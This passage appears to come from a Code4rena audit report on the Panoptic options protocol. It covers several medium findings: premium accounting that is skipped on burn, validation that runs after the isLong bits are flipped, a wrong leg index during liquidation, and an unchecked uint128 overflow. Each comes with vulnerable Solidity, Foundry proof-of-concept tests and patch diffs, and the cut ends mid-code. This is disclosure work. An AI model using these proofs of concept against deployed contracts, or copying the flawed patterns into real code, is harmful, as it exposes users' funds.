/// Used to compute the denominator for the fraction of premium available to sellers to collect
/// LeftRight - right slot is token0, left slot is token1
mapping(bytes32 chunkKey => LeftRightUnsigned lastGrossPremium) internal s_grossPremiumLast;
A critical rule: if `totalLiquidity` changes, this value must be recalculated.
When `Pool.mintOptions()` is called, `s_grossPremiumLast[chunkKey]` will increase. Call path: `mintOptions()` -> `_mintInSFPMAndUpdateCollateral()` -> `_updateSettlementPostMint()`.
function _updateSettlementPostMint(
TokenId tokenId,
LeftRightUnsigned[4] memory collectedByLeg,
uint128 positionSize
) internal {
...
if (tokenId.isLong(leg) == 0) {
LiquidityChunk liquidityChunk = PanopticMath.getLiquidityChunk(
tokenId,
leg,
positionSize
);
...
uint256[2] memory grossCurrent;
(grossCurrent[0], grossCurrent[1]) = SFPM.getAccountPremium(
address(s_univ3pool),
address(this),
tokenId.tokenType(leg),
liquidityChunk.tickLower(),
liquidityChunk.tickUpper(),
type(int24).max,
0
);
unchecked {
// L
LeftRightUnsigned grossPremiumLast = s_grossPremiumLast[chunkKey];
// R
uint256 positionLiquidity = liquidityChunk.liquidity();
// T (totalLiquidity is (T + R) after minting)
uint256 totalLiquidityBefore = totalLiquidity - positionLiquidity;
@> s_grossPremiumLast[chunkKey] = LeftRightUnsigned
.wrap(0)
.toRightSlot(
uint128(
(grossCurrent[0] *
positionLiquidity +
grossPremiumLast.rightSlot() *
totalLiquidityBefore) / (totalLiquidity)
)
)
.toLeftSlot(
uint128(
(grossCurrent[1] *
positionLiquidity +
grossPremiumLast.leftSlot() *
totalLiquidityBefore) / (totalLiquidity)
)
);
}
}
}
}
When `Pool.burnOptions()` is called, `s_grossPremiumLast[chunkKey]` will decrease. Call path: `burnOptions()` -> `_burnAndHandleExercise()` -> `_updateSettlementPostBurn()`.
function _updateSettlementPostBurn(
address owner,
TokenId tokenId,
LeftRightUnsigned[4] memory collectedByLeg,
uint128 positionSize,
bool commitLongSettled
) internal returns (LeftRightSigned realizedPremia, LeftRightSigned[4] memory premiaByLeg) {
...
uint256 numLegs = tokenId.countLegs();
uint256[2][4] memory premiumAccumulatorsByLeg;
// compute accumulated fees
(premiaByLeg, premiumAccumulatorsByLeg) = _getPremia(
tokenId,
positionSize,
owner,
COMPUTE_ALL_PREMIA,
type(int24).max
);
for (uint256 leg = 0; leg < numLegs; ) {
LeftRightSigned legPremia = premiaByLeg[leg];
bytes32 chunkKey = keccak256(
abi.encodePacked(tokenId.strike(leg), tokenId.width(leg), tokenId.tokenType(leg))
);
// collected from Uniswap
LeftRightUnsigned settledTokens = s_settledTokens[chunkKey].add(collectedByLeg[leg]);
@> if (LeftRightSigned.unwrap(legPremia) != 0) {
// (will be) paid by long legs
if (tokenId.isLong(leg) == 1) {
...
} else {
uint256 positionLiquidity = PanopticMath
.getLiquidityChunk(tokenId, leg, positionSize)
.liquidity();
// new totalLiquidity (total sold) = removedLiquidity + netLiquidity (T - R)
uint256 totalLiquidity = _getTotalLiquidity(tokenId, leg);
// T (totalLiquidity is (T - R) after burning)
uint256 totalLiquidityBefore = totalLiquidity + positionLiquidity;
LeftRightUnsigned grossPremiumLast = s_grossPremiumLast[chunkKey];
LeftRightUnsigned availablePremium = _getAvailablePremium(
totalLiquidity + positionLiquidity,
settledTokens,
grossPremiumLast,
LeftRightUnsigned.wrap(uint256(LeftRightSigned.unwrap(legPremia))),
premiumAccumulatorsByLeg[leg]
);
// subtract settled tokens sent to seller
settledTokens = settledTokens.sub(availablePremium);
// add available premium to amount that should be settled
realizedPremia = realizedPremia.add(
LeftRightSigned.wrap(int256(LeftRightUnsigned.unwrap(availablePremium)))
);
...
unchecked {
uint256[2][4] memory _premiumAccumulatorsByLeg = premiumAccumulatorsByLeg;
uint256 _leg = leg;
// if there's still liquidity, compute the new grossPremiumLast
// otherwise, we just reset grossPremiumLast to the current grossPremium
@> s_grossPremiumLast[chunkKey] = totalLiquidity != 0
? LeftRightUnsigned
.wrap(0)
.toRightSlot(
uint128(
uint256(
Math.max(
(int256(
grossPremiumLast.rightSlot() *
totalLiquidityBefore
) -
int256(
_premiumAccumulatorsByLeg[_leg][0] *
positionLiquidity
)) + int256(legPremia.rightSlot() * 2 ** 64),
0
)
) / totalLiquidity
)
)
.toLeftSlot(
uint128(
uint256(
Math.max(
(int256(
grossPremiumLast.leftSlot() *
totalLiquidityBefore
) -
int256(
_premiumAccumulatorsByLeg[_leg][1] *
positionLiquidity
)) + int256(legPremia.leftSlot()) * 2 ** 64,
0
)
) / totalLiquidity
)
)
: LeftRightUnsigned
.wrap(0)
.toRightSlot(uint128(premiumAccumulatorsByLeg[_leg][0]))
.toLeftSlot(uint128(premiumAccumulatorsByLeg[_leg][1]));
}
}
}
// update settled tokens in storage with all local deltas
s_settledTokens[chunkKey] = settledTokens;
unchecked {
++leg;
}
The issue lies within `_updateSettlementPostBurn()`: the condition `if (LeftRightSigned.unwrap(legPremia) != 0)` must be met for `s_grossPremiumLast[chunkKey]` to decrease. As a result, `s_grossPremiumLast[chunkKey]` is not recalculated even when `totalLiquidity` changes.
For example, within the same block, if a user executes `mintOptions()`, `s_grossPremiumLast[chunkKey]` increases by 50. Immediately afterwards, executing `burnOptions()` does not decrease `s_grossPremiumLast[chunkKey]` by 50, because `legPremia == 0`.
The following code demonstrates this scenario, where `s_grossPremiumLast[chunkKey]` keeps increasing, so the `last gross accumulated` value keeps decreasing.
- Add to `Misc.t.sol`:
function test_burn_not_reduce_last() public {
swapperc = new SwapperC();
vm.startPrank(Swapper);
token0.mint(Swapper, type(uint128).max);
token1.mint(Swapper, type(uint128).max);
token0.approve(address(swapperc), type(uint128).max);
token1.approve(address(swapperc), type(uint128).max);
// mint OTM position
$posIdList.push(
TokenId.wrap(0).addPoolId(PanopticMath.getPoolId(address(uniPool))).addLeg(
0,
1,
1,
0,
0,
0,
15,
1
)
);
//@info Bob same gross
vm.startPrank(Bob);
pp.mintOptions($posIdList, 1_000_000, 0, 0, 0);
vm.startPrank(Swapper);
swapperc.swapTo(uniPool, Math.getSqrtRatioAtTick(10) + 1);
// 1998600539
accruePoolFeesInRange(address(uniPool), (uniPool.liquidity() * 2) / 3, 1, 1);
swapperc.swapTo(uniPool, 2 ** 96);
//@info end of Bob same gross
//@info start alice , it should without change gross
console.log("*****start alice mint/burn should not reduce last accumulated");
for(uint256 i=0;i<10;i++){
vm.startPrank(Alice);
pp.mintOptions($posIdList, 250_000, type(uint64).max, 0, 0);
vm.startPrank(Alice);
pp.burnOptions($posIdList[0], new TokenId[](0), 0, 0);
}
}
- Add to `PanopticPool.sol`:
function _updateSettlementPostMint(
TokenId tokenId,
LeftRightUnsigned[4] memory collectedByLeg,
uint128 positionSize
) internal {
...
unchecked {
// L
LeftRightUnsigned grossPremiumLast = s_grossPremiumLast[chunkKey];
// R
uint256 positionLiquidity = liquidityChunk.liquidity();
// T (totalLiquidity is (T + R) after minting)
uint256 totalLiquidityBefore = totalLiquidity - positionLiquidity;
//console.log("s_grossPremiumLast[chunkKey].rightSlot() from:",s_grossPremiumLast[chunkKey].rightSlot());
s_grossPremiumLast[chunkKey] = LeftRightUnsigned
.wrap(0)
.toRightSlot(
uint128(
(grossCurrent[0] *
positionLiquidity +
grossPremiumLast.rightSlot() *
totalLiquidityBefore) / (totalLiquidity)
)
)
.toLeftSlot(
uint128(
(grossCurrent[1] *
positionLiquidity +
grossPremiumLast.leftSlot() *
totalLiquidityBefore) / (totalLiquidity)
)
);
+ console.log("last accumulated : ",(grossCurrent[0] - s_grossPremiumLast[chunkKey].rightSlot()) * totalLiquidity);
}
}
}
}
$ forge test -vvv --match-test test_burn_not_reduce_last
[PASS] test_burn_not_reduce_last() (gas: 5276055)
Logs:
last accumulated : 0
*****start alice mint/burn should not reduce last accumulated
last accumulated : 36893488148466911062
last accumulated : 29514790528266881407
last accumulated : 23611832432106857683
last accumulated : 18889465953679888300
last accumulated : 15111572767940411986
last accumulated : 12089258220348131204
last accumulated : 9671406580275706040
last accumulated : 7737125266718815505
last accumulated : 6189700215873303077
last accumulated : 4951760174697243000
Due to the incorrect accounting of `s_grossPremiumLast[chunkKey]`, the calculation in `_getAvailablePremium()` is also incorrect. This results in inaccuracies in the amount of premium received by the seller when closing their position.
Regardless of the value of `legPremia`, `s_grossPremiumLast[chunkKey]` should be recalculated when `long == 0`:
function _updateSettlementPostBurn(
address owner,
TokenId tokenId,
LeftRightUnsigned[4] memory collectedByLeg,
uint128 positionSize,
bool commitLongSettled
) internal returns (LeftRightSigned realizedPremia, LeftRightSigned[4] memory premiaByLeg) {
...
for (uint256 leg = 0; leg < numLegs; ) {
LeftRightSigned legPremia = premiaByLeg[leg];
bytes32 chunkKey = keccak256(
abi.encodePacked(tokenId.strike(leg), tokenId.width(leg), tokenId.tokenType(leg))
);
// collected from Uniswap
LeftRightUnsigned settledTokens = s_settledTokens[chunkKey].add(collectedByLeg[leg]);
if (LeftRightSigned.unwrap(legPremia) != 0) {
// (will be) paid by long legs
if (tokenId.isLong(leg) == 1) {
...
} else {
....
// subtract settled tokens sent to seller
settledTokens = settledTokens.sub(availablePremium);
// add available premium to amount that should be settled
realizedPremia = realizedPremia.add(
LeftRightSigned.wrap(int256(LeftRightUnsigned.unwrap(availablePremium)))
);
- unchecked {
- uint256[2][4] memory _premiumAccumulatorsByLeg = premiumAccumulatorsByLeg;
- uint256 _leg = leg;
-
- // if there's still liquidity, compute the new grossPremiumLast
- // otherwise, we just reset grossPremiumLast to the current grossPremium
- s_grossPremiumLast[chunkKey] = totalLiquidity != 0
- ? LeftRightUnsigned
- .wrap(0)
- .toRightSlot(
- uint128(
- uint256(
- Math.max(
- (int256(
- grossPremiumLast.rightSlot() *
- totalLiquidityBefore
- ) -
- int256(
- _premiumAccumulatorsByLeg[_leg][0] *
- positionLiquidity
- )) + int256(legPremia.rightSlot() * 2 ** 64),
- 0
- )
- ) / totalLiquidity
- )
- )
- .toLeftSlot(
- uint128(
- uint256(
- Math.max(
- (int256(
- grossPremiumLast.leftSlot() *
- totalLiquidityBefore
- ) -
- int256(
- _premiumAccumulatorsByLeg[_leg][1] *
- positionLiquidity
- )) + int256(legPremia.leftSlot()) * 2 ** 64,
- 0
- )
- ) / totalLiquidity
- )
- )
- : LeftRightUnsigned
- .wrap(0)
- .toRightSlot(uint128(premiumAccumulatorsByLeg[_leg][0]))
- .toLeftSlot(uint128(premiumAccumulatorsByLeg[_leg][1]));
- }
}
}
+ if (tokenId.isLong(leg) == 0){
+ uint256 positionLiquidity = PanopticMath
+ .getLiquidityChunk(tokenId, leg, positionSize)
+ .liquidity();
+
+ // new totalLiquidity (total sold) = removedLiquidity + netLiquidity (T - R)
+ uint256 totalLiquidity = _getTotalLiquidity(tokenId, leg);
+ // T (totalLiquidity is (T - R) after burning)
+ uint256 totalLiquidityBefore = totalLiquidity + positionLiquidity;
+
+ LeftRightUnsigned grossPremiumLast = s_grossPremiumLast[chunkKey];
+ unchecked {
+ uint256[2][4] memory _premiumAccumulatorsByLeg = premiumAccumulatorsByLeg;
+ uint256 _leg = leg;
+
+ // if there's still liquidity, compute the new grossPremiumLast
+ // otherwise, we just reset grossPremiumLast to the current grossPremium
+ s_grossPremiumLast[chunkKey] = totalLiquidity != 0
+ ? LeftRightUnsigned
+ .wrap(0)
+ .toRightSlot(
+ uint128(
+ uint256(
+ Math.max(
+ (int256(
+ grossPremiumLast.rightSlot() *
+ totalLiquidityBefore
+ ) -
+ int256(
+ _premiumAccumulatorsByLeg[_leg][0] *
+ positionLiquidity
+ )) + int256(legPremia.rightSlot() * 2 ** 64),
+ 0
+ )
+ ) / totalLiquidity
+ )
+ )
+ .toLeftSlot(
+ uint128(
+ uint256(
+ Math.max(
+ (int256(
+ grossPremiumLast.leftSlot() *
+ totalLiquidityBefore
+ ) -
+ int256(
+ _premiumAccumulatorsByLeg[_leg][1] *
+ positionLiquidity
+ )) + int256(legPremia.leftSlot()) * 2 ** 64,
+ 0
+ )
+ ) / totalLiquidity
+ )
+ )
+ : LeftRightUnsigned
+ .wrap(0)
+ .toRightSlot(uint128(premiumAccumulatorsByLeg[_leg][0]))
+ .toLeftSlot(uint128(premiumAccumulatorsByLeg[_leg][1]));
+ }
+ }
}
// update settled tokens in storage with all local deltas
s_settledTokens[chunkKey] = settledTokens;
unchecked {
++leg;
}
}
}
}
Context
[M-07] When burning a tokenized position, `validate()` should be done before flipping the `isLong` bits in `_validateAndForwardToAMM()`
Submitted by 0xdice91
Each leg in a `tokenId` has a risk partner, which is usually its own index but in some cases can be another leg (a partner in a defined-risk position). In the function `validate()`, if the risk partner of a specific leg is not its own index, additional checks are done to ensure the two legs are compatible, such as:
- Ensuring that risk partners are mutual.
- Ensuring that risk partners have the same asset.
- Ensuring that risk partners have the same ratio.
- Plus other checks that depend on the leg's `isLong` value compared to that of its risk partner.
function validate(TokenId self) internal pure {
if (self.optionRatio(0) == 0) revert Errors.InvalidTokenIdParameter(1);
// More Code...
// In the following, we check whether the risk partner of this leg is itself
// or another leg in this position.
// Handles case where riskPartner(i) != i ==> leg i has a risk partner that is another leg
uint256 riskPartnerIndex = self.riskPartner(i);
if (riskPartnerIndex != i) {
// Ensures that risk partners are mutual
if (self.riskPartner(riskPartnerIndex) != i)
revert Errors.InvalidTokenIdParameter(3);
// Ensures that risk partners have 1) the same asset, and 2) the same ratio
if (
(self.asset(riskPartnerIndex) != self.asset(i)) ||
(self.optionRatio(riskPartnerIndex) != self.optionRatio(i))
) revert Errors.InvalidTokenIdParameter(3);
// long/short status of associated legs
uint256 _isLong = self.isLong(i);
uint256 isLongP = self.isLong(riskPartnerIndex);
// token type status of associated legs (call/put)
uint256 _tokenType = self.tokenType(i);
uint256 tokenTypeP = self.tokenType(riskPartnerIndex);
// if the position is the same i.e both long calls, short put's etc.
// then this is a regular position, not a defined risk position
if ((_isLong == isLongP) && (_tokenType == tokenTypeP))
revert Errors.InvalidTokenIdParameter(4);
// if the two token long-types and the tokenTypes are both different (one is a short call, the other a long put, e.g.), this is a synthetic position
// A synthetic long or short is more capital efficient than each leg separated because the long+short premia accumulate proportionally
// unlike short stranlges, long strangles also cannot be partnered, because there is no reduction in risk (both legs can earn premia simultaneously)
if (((_isLong != isLongP) || _isLong == 1) && (_tokenType != tokenTypeP))
revert Errors.InvalidTokenIdParameter(5);
}
} // end for loop over legs
}
}
In `burnTokenizedPosition()` the internal function `_validateAndForwardToAMM()` is called. This function calls `TokenId.flipToBurnToken()`, which simply flips the `isLong` bits of all active legs of the `tokenId`. Then `validate()` is called, which validates the position `tokenId` and its legs.
/// @param tokenId the option position
/// @param positionSize the size of the position to create
/// @param tickLimitLow lower limits on potential slippage
/// @param tickLimitHigh upper limits on potential slippage
/// @param isBurn is equal to false for mints and true for burns
/// @return collectedByLeg An array of LeftRight encoded words containing the amount of token0 and token1 collected as fees for each leg
/// @return totalMoved the total amount of funds swapped in Uniswap as part of building potential ITM positions
function _validateAndForwardToAMM(
TokenId tokenId,
uint128 positionSize,
int24 tickLimitLow,
int24 tickLimitHigh,
bool isBurn
) internal returns (LeftRightUnsigned[4] memory collectedByLeg, LeftRightSigned totalMoved) {
// Reverts if positionSize is 0 and user did not own the position before minting/burning
if (positionSize == 0) revert Errors.OptionsBalanceZero();
/// @dev the flipToBurnToken() function flips the isLong bits
if (isBurn) {
tokenId = tokenId.flipToBurnToken();
}
// Validate tokenId
tokenId.validate();
// Extract univ3pool from the poolId map to Uniswap Pool
IUniswapV3Pool univ3pool = s_poolContext[tokenId.poolId()].pool;
// Revert if the pool not been previously initialized
if (univ3pool == IUniswapV3Pool(address(0))) revert Errors.UniswapPoolNotInitialized();
// More Code...
}
The issue here is that if a leg in the `tokenId` has another leg as its risk partner (that is, it is not its own risk partner), then flipping the `isLong` bits may cause one of the checks in `validate()` to fail and revert, as the `isLong` bits of its risk partner are not changed as well.
Remember that flipping changes the value of the bit to its opposite (from 0 to 1, or from 1 to 0).
For example, say a leg with a different risk partner has the same `isLong()` value as its partner but a different `tokenType()`. This would easily pass the checks below from `validate()`, but after a flip is done to its `isLong` bits using `flipToBurnToken()`, it will fail and revert on the second check below.
// if the position is the same i.e both long calls, short put's etc.
// then this is a regular position, not a defined risk position
if ((_isLong == isLongP) && (_tokenType == tokenTypeP))
revert Errors.InvalidTokenIdParameter(4);
// if the two token long-types and the tokenTypes are both different (one is a short call, the other a long put, e.g.), this is a synthetic position
// A synthetic long or short is more capital efficient than each leg separated because the long+short premia accumulate proportionally
// unlike short stranlges, long strangles also cannot be partnered, because there is no reduction in risk (both legs can earn premia simultaneously)
if (((_isLong != isLongP) || _isLong == 1) && (_tokenType != tokenTypeP))
revert Errors.InvalidTokenIdParameter(5);
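Concretely, take a partnered short strangle: both legs have `isLong == 0` and different `tokenType`s, so both checks above pass at mint time. On burn, `flipToBurnToken()` flips the leg's `isLong` bit to 1, and the second check now triggers (`_isLong == 1` with `_tokenType != tokenTypeP`, i.e., a long strangle, which cannot be partnered), so the burn reverts with `InvalidTokenIdParameter(5)`.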
This will result in a continuous revert of the function, leading to an inability to burn a tokenized position.
This whole issue results from the simple fact that risk partners, if different, are not flipped as well. I recommend validating the `tokenId` before flipping the `isLong` bits, to ensure that any changes caused by flipping will not affect the execution of the function.
/// @param tokenId the option position
/// @param positionSize the size of the position to create
/// @param tickLimitLow lower limits on potential slippage
/// @param tickLimitHigh upper limits on potential slippage
/// @param isBurn is equal to false for mints and true for burns
/// @return collectedByLeg An array of LeftRight encoded words containing the amount of token0 and token1 collected as fees for each leg
/// @return totalMoved the total amount of funds swapped in Uniswap as part of building potential ITM positions
function _validateAndForwardToAMM(
TokenId tokenId,
uint128 positionSize,
int24 tickLimitLow,
int24 tickLimitHigh,
bool isBurn
) internal returns (LeftRightUnsigned[4] memory collectedByLeg, LeftRightSigned totalMoved) {
// Reverts if positionSize is 0 and user did not own the position before minting/burning
if (positionSize == 0) revert Errors.OptionsBalanceZero();
++ // Validate tokenId
++ tokenId.validate();
/// @dev the flipToBurnToken() function flips the isLong bits
if (isBurn) {
tokenId = tokenId.flipToBurnToken();
}
// Extract univ3pool from the poolId map to Uniswap Pool
IUniswapV3Pool univ3pool = s_poolContext[tokenId.poolId()].pool;
// Revert if the pool not been previously initialized
if (univ3pool == IUniswapV3Pool(address(0))) revert Errors.UniswapPoolNotInitialized();
// More Code...
}
Keeping Medium severity under "functionality is broken".
Submitted by Aymen0909, also found by FastChecker, 0xStalin, and DanielArmstrong
https://github.com/code-423n4/2024-04-panoptic/blob/main/contracts/PanopticPool.sol#L1122-L1131
When a user's positions are getting liquidated, the `PanopticPool::liquidate` function will invoke under the hood the `PanopticMath::haircutPremia` function, which uses the user's long premium to cover the protocol losses.
The `PanopticMath::haircutPremia` function will also update the storage mapping `settledTokens`, which represents the per-chunk accumulator of tokens owed to options sellers.
The issue present in the `PanopticMath::haircutPremia` function is that when it runs the for-loop to update `settledTokens` for each position leg chunk, it always uses index `0` when calculating the leg `chunkKey` instead of the actual leg index `leg` (which can be 0, 1, 2, or 3). This is shown in the code snippet below:
function haircutPremia(
address liquidatee,
TokenId[] memory positionIdList,
LeftRightSigned[4][] memory premiasByLeg,
LeftRightSigned collateralRemaining,
CollateralTracker collateral0,
CollateralTracker collateral1,
uint160 sqrtPriceX96Final,
mapping(bytes32 chunkKey => LeftRightUnsigned settledTokens) storage settledTokens
) external returns (int256, int256) {
...
for (uint256 i = 0; i < positionIdList.length; i++) {
TokenId tokenId = positionIdList[i];
LeftRightSigned[4][] memory _premiasByLeg = premiasByLeg;
for (uint256 leg = 0; leg < tokenId.countLegs(); ++leg) {
if (tokenId.isLong(leg) == 1) {
mapping(bytes32 chunkKey => LeftRightUnsigned settledTokens)
storage _settledTokens = settledTokens;
// calculate amounts to revoke from settled and subtract from haircut req
uint256 settled0 = Math.unsafeDivRoundingUp(
uint128(-_premiasByLeg[i][leg].rightSlot()) * uint256(haircut0),
uint128(longPremium.rightSlot())
);
uint256 settled1 = Math.unsafeDivRoundingUp(
uint128(-_premiasByLeg[i][leg].leftSlot()) * uint256(haircut1),
uint128(longPremium.leftSlot())
);
//@audit always calculating the chunkKey of leg 0
bytes32 chunkKey = keccak256(
abi.encodePacked(
tokenId.strike(0),
tokenId.width(0),
tokenId.tokenType(0)
)
);
// The long premium is not commited to storage during the liquidation, so we add the entire adjusted amount
// for the haircut directly to the accumulator
settled0 = Math.max(
0,
uint128(-_premiasByLeg[i][leg].rightSlot()) - settled0
);
settled1 = Math.max(
0,
uint128(-_premiasByLeg[i][leg].leftSlot()) - settled1
);
_settledTokens[chunkKey] = _settledTokens[chunkKey].add(
LeftRightUnsigned.wrap(0).toRightSlot(uint128(settled0)).toLeftSlot(
uint128(settled1)
)
);
}
}
}
return (collateralDelta0, collateralDelta1);
}
This issue means that the `settledTokens` accumulator will be updated incorrectly and will not include the premium of all the legs, as for each position only the first leg (index 0) is considered. The wrong leg `chunkKey` calculation in `haircutPremia` causes an incorrect update of the `settledTokens` accumulator, resulting in loss of funds for the options sellers and for the protocol.
VS Code
Use the correct leg index when calculating the leg `chunkKey` in the `haircutPremia` function; the correct code should be:
function haircutPremia(
address liquidatee,
TokenId[] memory positionIdList,
LeftRightSigned[4][] memory premiasByLeg,
LeftRightSigned collateralRemaining,
CollateralTracker collateral0,
CollateralTracker collateral1,
uint160 sqrtPriceX96Final,
mapping(bytes32 chunkKey => LeftRightUnsigned settledTokens) storage settledTokens
) external returns (int256, int256) {
...
for (uint256 i = 0; i < positionIdList.length; i++) {
TokenId tokenId = positionIdList[i];
LeftRightSigned[4][] memory _premiasByLeg = premiasByLeg;
for (uint256 leg = 0; leg < tokenId.countLegs(); ++leg) {
if (tokenId.isLong(leg) == 1) {
mapping(bytes32 chunkKey => LeftRightUnsigned settledTokens)
storage _settledTokens = settledTokens;
// calculate amounts to revoke from settled and subtract from haircut req
uint256 settled0 = Math.unsafeDivRoundingUp(
uint128(-_premiasByLeg[i][leg].rightSlot()) * uint256(haircut0),
uint128(longPremium.rightSlot())
);
uint256 settled1 = Math.unsafeDivRoundingUp(
uint128(-_premiasByLeg[i][leg].leftSlot()) * uint256(haircut1),
uint128(longPremium.leftSlot())
);
bytes32 chunkKey = keccak256(
abi.encodePacked(
-- tokenId.strike(0),
-- tokenId.width(0),
-- tokenId.tokenType(0)
++ tokenId.strike(leg),
++ tokenId.width(leg),
++ tokenId.tokenType(leg)
)
);
// The long premium is not commited to storage during the liquidation, so we add the entire adjusted amount
// for the haircut directly to the accumulator
settled0 = Math.max(
0,
uint128(-_premiasByLeg[i][leg].rightSlot()) - settled0
);
settled1 = Math.max(
0,
uint128(-_premiasByLeg[i][leg].leftSlot()) - settled1
);
_settledTokens[chunkKey] = _settledTokens[chunkKey].add(
LeftRightUnsigned.wrap(0).toRightSlot(uint128(settled0)).toLeftSlot(
uint128(settled1)
)
);
}
}
}
return (collateralDelta0, collateralDelta1);
}
Assessed type: Context
dyedm1 (Panoptic) confirmed and commented:
I will confirm this because we are fixing it, but I don't think high severity is justified here. The only impact is that during liquidations, premium paid by the liquidatee for legs other than 0 is effectively haircut/refunded to the liquidatee, which could result in an uneven distribution of the haircut and some premium that could have been safely paid being refunded to the liquidatee. Besides resulting in unfair distribution at liquidation time for sellers in the 2-3-4 chunks, no actor in the protocol actually loses funds (yield for sellers is not realized until it is settled anyway, so if they closed before the liquidation occurred they would get the exact same payment).
Picodes (judge) decreased severity to Medium and commented:
Giving Medium severity as this only concerns unrealized yield and happens during liquidations only.
[M-09] Removed liquidity can overflow when calling the `SemiFungiblePositionManager.mintTokenizedPosition` function
Submitted by rbserver
The following `mintTokenizedPosition` function eventually calls the `_createLegInAMM` function below.
function mintTokenizedPosition(
TokenId tokenId,
uint128 positionSize,
int24 slippageTickLimitLow,
int24 slippageTickLimitHigh
)
external
ReentrancyLock(tokenId.poolId())
returns (LeftRightUnsigned[4] memory collectedByLeg, LeftRightSigned totalSwapped)
{
// create the option position via its ID in this erc1155
_mint(msg.sender, TokenId.unwrap(tokenId), positionSize);
...
// validate the incoming option position, then forward to the AMM for minting/burning required liquidity chunks
(collectedByLeg, totalSwapped) = _validateAndForwardToAMM(
tokenId,
positionSize,
slippageTickLimitLow,
slippageTickLimitHigh,
MINT
);
}
The `_createLegInAMM` function increases the removed liquidity when minting a long position by executing `unchecked { removedLiquidity += chunkLiquidity }`, where the related code comment states that "we can't remove more liquidity than we add in the first place, so this can't overflow". However, repeatedly minting contracts of the short and long positions can in fact grow the removed liquidity until it overflows `uint128`, which means the `unchecked` block is unsafe. When such an overflow occurs, the accounting for the removed liquidity and the liquidity becomes incorrect: the overflowed removed-liquidity value is smaller than it should be, and burning it would increase the liquidity by less than it should.
function _createLegInAMM(
IUniswapV3Pool univ3pool,
TokenId tokenId,
uint256 leg,
LiquidityChunk liquidityChunk,
bool isBurn
)
internal
returns (
LeftRightSigned moved,
LeftRightSigned itmAmounts,
LeftRightUnsigned collectedSingleLeg
)
{
...
uint128 updatedLiquidity;
uint256 isLong = tokenId.isLong(leg);
LeftRightUnsigned currentLiquidity = s_accountLiquidity[positionKey]; //cache
{
...
uint128 startingLiquidity = currentLiquidity.rightSlot();
uint128 removedLiquidity = currentLiquidity.leftSlot();
uint128 chunkLiquidity = liquidityChunk.liquidity();
if (isLong == 0) {
// selling/short: so move from msg.sender *to* uniswap
// we're minting more liquidity in uniswap: so add the incoming liquidity chunk to the existing liquidity chunk
updatedLiquidity = startingLiquidity + chunkLiquidity;
/// @dev If the isLong flag is 0=short but the position was burnt, then this is closing a long position
/// @dev so the amount of removed liquidity should decrease.
if (isBurn) {
removedLiquidity -= chunkLiquidity;
}
} else {
// the _leg is long (buying: moving *from* uniswap to msg.sender)
// so we seek to move the incoming liquidity chunk *out* of uniswap - but was there sufficient liquidity sitting in uniswap
// in the first place?
if (startingLiquidity < chunkLiquidity) {
// the amount we want to move (liquidityChunk.legLiquidity()) out of uniswap is greater than
// what the account that owns the liquidity in uniswap has (startingLiquidity)
// we must ensure that an account can only move its own liquidity out of uniswap
// so we revert in this case
revert Errors.NotEnoughLiquidity();
} else {
// startingLiquidity is >= chunkLiquidity, so no possible underflow
unchecked {
// we want to move less than what already sits in uniswap, no problem:
updatedLiquidity = startingLiquidity - chunkLiquidity;
}
}
/// @dev If the isLong flag is 1=long and the position is minted, then this is opening a long position
/// @dev so the amount of removed liquidity should increase.
if (!isBurn) {
// we can't remove more liquidity than we add in the first place, so this can't overflow
unchecked {
removedLiquidity += chunkLiquidity;
}
}
}
// update the starting liquidity for this position for next time around
s_accountLiquidity[positionKey] = LeftRightUnsigned
.wrap(0)
.toLeftSlot(removedLiquidity)
.toRightSlot(updatedLiquidity);
}
...
}
Please add the following test to `test\foundry\core\SemiFungiblePositionManager.t.sol`. The test passes, demonstrating the described scenario.
function test_removedLiquidityOverflow() public {
_initPool(0);
_cacheWorldState(USDC_WETH_30);
sfpm.initializeAMMPool(token0, token1, fee);
int24 width = 4090;
int24 strike = 0;
populatePositionData(width, strike, 0, 0);
uint128 psnSize = type(uint128).max / 70;
TokenId shortTokenId = TokenId.wrap(0).addPoolId(poolId).addLeg(
0,
1,
isWETH,
0,
0,
0,
strike,
width
);
TokenId longTokenId = TokenId.wrap(0).addPoolId(poolId).addLeg(
0,
1,
isWETH,
1,
0,
0,
strike,
width
);
// repeatedly mint contracts of the short and long positions
for (uint256 i = 0; i < 32311; i++) {
sfpm.mintTokenizedPosition(
shortTokenId,
psnSize,
TickMath.MIN_TICK,
TickMath.MAX_TICK
);
sfpm.mintTokenizedPosition(
longTokenId,
psnSize,
TickMath.MIN_TICK,
TickMath.MAX_TICK
);
}
accountLiquidities = sfpm.getAccountLiquidity(
address(USDC_WETH_30),
Alice,
0,
tickLower,
tickUpper
);
// at this moment, the removed liquidity does not overflow uint128 yet
uint128 accountLiquidities_leftSlot_before_overflow = accountLiquidities.leftSlot();
assertLt(accountLiquidities_leftSlot_before_overflow, type(uint128).max);
// mint contracts of the short and long positions for one more time
sfpm.mintTokenizedPosition(
shortTokenId,
psnSize,
TickMath.MIN_TICK,
TickMath.MAX_TICK
);
sfpm.mintTokenizedPosition(
longTokenId,
psnSize,
TickMath.MIN_TICK,
TickMath.MAX_TICK
);
accountLiquidities = sfpm.getAccountLiquidity(
address(USDC_WETH_30),
Alice,
0,
tickLower,
tickUpper
);
// the removed liquidity has overflowed uint128 since it is now less than its previous value
assertLt(accountLiquidities.leftSlot(), accountLiquidities_leftSlot_before_overflow);
}
SemiFungiblePositionManager.sol#L1029-L1034 can be updated to the following code:
if (!isBurn) {
removedLiquidity += chunkLiquidity;
}
Assessed type: Under/Overflow
For this audit, 43 reports were submitted by wardens detailing low risk and non-critical issues. The report highlighted below by DadeKuma received the top score from the judge.
The following wardens also submitted reports: 99Crits, favelanky, cheatc0d3, slvDev, bareli, Rolezn, hihen, Dup1337, Bauchibred, 0xStalin, ZanyBonzy, albahaca, radin100, Naresh, grearlake, rbserver, d3e4, zabihullahazadzoi, Aymen0909, John_Femi, lanrebayode77, KupiaSec, jasonxiale, satoshispeedrunner, CodeWasp, sammy, pfapostol, Rhaydden, blockchainbuttonmasher, jesjupyter, mining_mario, twcctop, 0xhacksmithh, K42, Topmark, lsaudit, lirezArAzAvi, crc32, codeslide, oualidpro, Sathish9098, and IllIllI.
The median calculation is wrong: it always assumes an odd length, but the math differs when the length is even. In that case, it should be:
return int24((sortedTicks[9] + sortedTicks[10]) / 2);
There is 1 instance of this issue.
File: contracts/libraries/PanopticMath.sol
266: return int24(sortedTicks[10]);
[266]
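For illustration only, a minimal sketch of the even-length case (the `medianOfTwenty` helper is hypothetical, matching the `sortedTicks[9]`/`sortedTicks[10]` indices above; not the project's code):

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

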